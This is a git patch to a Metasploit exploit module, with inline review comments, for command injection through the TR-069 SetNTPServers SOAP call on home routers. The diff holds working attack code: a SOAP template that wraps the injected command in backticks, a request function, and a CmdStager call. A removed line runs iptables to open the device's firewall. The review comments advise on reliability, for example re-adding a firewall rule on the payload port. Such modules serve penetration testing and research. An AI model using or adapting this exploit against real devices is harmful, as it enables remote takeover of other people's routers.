From 4d6b2dfb460a6025174620b099903e98544f98c3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 29 Nov 2016 15:03:38 -0600 Subject: [PATCH] Use CmdStager instead Oh, and this is totally untested as of this commit. --- .../linux/http/tr069_ntpserver_cmdinject.rb | 81 ++++++++++--------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb index a61f5d6272..821ea6f723 100644 --- a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb +++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb @@ -4,6 +4,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, @@ -20,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'Kenzo', # Vulnerability discovery and original Metasploit module + 'Michael Messner ', # Copypasta from TheMoon msf module 'todb', # Metasploit module 'wvu' , # Metasploit module '0x27' # Metasploit module 
@@ -54,34 +56,59 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - Opt::RPORT(7547), # CWMP port + Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands ], self.class) - @data_cmd_template = "" - @data_cmd_template << "" - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << " %s" - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << " " - @data_cmd_template << "" + end + + def set_new_ntp_server(cmd) + template = "" + template << "" + template << " " + template << " " + template << " `%s`" # Backticks, aw yeah + template << " " + template << " " + template << " " + template << " " + template << " " + template << " " + template << "" + + template % cmd + end + + def execute_command(cmd, opts) + uri = '/UD/act?1' + soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers" + injected_data = set_new_ntp_server(cmd) + begin + res = send_request_cgi({ + 'uri' => uri, + 'ctype' => "text/xml", + 'method' => 'POST', + 'headers' => { + 'SOAPAction' => soapaction, + }, + 'data' => injected_data + }, 2) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end end def check begin res = send_request_cgi({ - 'uri' => '/globe' + 'uri' => '/globe' # TODO: Check this? Why not /UD/act?1 }) rescue ::Rex::ConnectionError vprint_error("A connection error has occured") return Exploit::CheckCode::Unknown end - if res and res.code == 404 and res.body =~ /home_wan.htm/ + if res and res.code == 404 and res.body =~ /home_wan\.htm/ return Exploit::CheckCode::Appears end 
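Review bot: `set_new_ntp_server` drops the staged command into the SOAP body verbatim (`template << " `%s`"` then `template % cmd`), so a `<` or `&` in any chunk makes the XML ill-formed before the device reaches the backtick evaluation; the echo flavor pinned elsewhere only emits `>>` and `;`, which XML character data tolerates, but nothing in this method enforces that. Either escape the two forbidden characters, `template % cmd.gsub('&', '&amp;').gsub('<', '&lt;')`, if the device's parser decodes entities (worth confirming on hardware), or state the constraint next to the format line: `# cmd is inserted as raw XML text: it must not contain '<' or '&'`. The `# TODO: Check this? Why not /UD/act?1` left in `check` can be answered now: a SetNTPServers POST to `/UD/act?1` rewrites the device's NTP setting, so it is not a side-effect-free probe and the `/globe` 404 fingerprint is the right choice; replace the TODO with `# /globe's 404 page fingerprints the firmware; probing /UD/act?1 would change device config`. `check` continues past the end of this hunk.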
@@ -96,29 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote end print_status("Exploiting...") - print_status("Dropping firewall on port 80...") - execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","") - execute_command("tick.eircom.net","") - end - - def execute_command(cmd, opts) - uri = '/UD/act?1' - soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers" - data_cmd = @data_cmd_template % "#{cmd}" - begin - res = send_request_cgi({ - 'uri' => uri, - 'ctype' => "text/xml", - 'method' => 'POST', - 'headers' => { - 'SOAPAction' => soapaction, - }, - 'data' => data_cmd - }) - return res - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end + execute_cmdstager({:flavor => :echo}) end end
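Review bot: Removing the `iptables -I INPUT -p tcp --dport 80 -j ACCEPT` step also removes the only thing that opened inbound traffic on the device, so `execute_cmdstager({:flavor => :echo})` is complete for reverse payloads but bind payloads would now be blocked by the CPE's firewall; whether bind payloads are meant to stay supported is decided by the module metadata, which is outside this hunk. If they are, keep one firewall command ahead of the stager, aimed at the payload port rather than 80: `execute_command("iptables -I INPUT -p tcp --dport #{datastore['LPORT']} -j ACCEPT", {})`. The echo chunks are also sent with no `linemax`, and the NTP server field on these devices may cap the value length, so `execute_cmdstager({:flavor => :echo, :linemax => ...})` is worth confirming on hardware given the commit message says this is untested. `exploit` begins before this hunk.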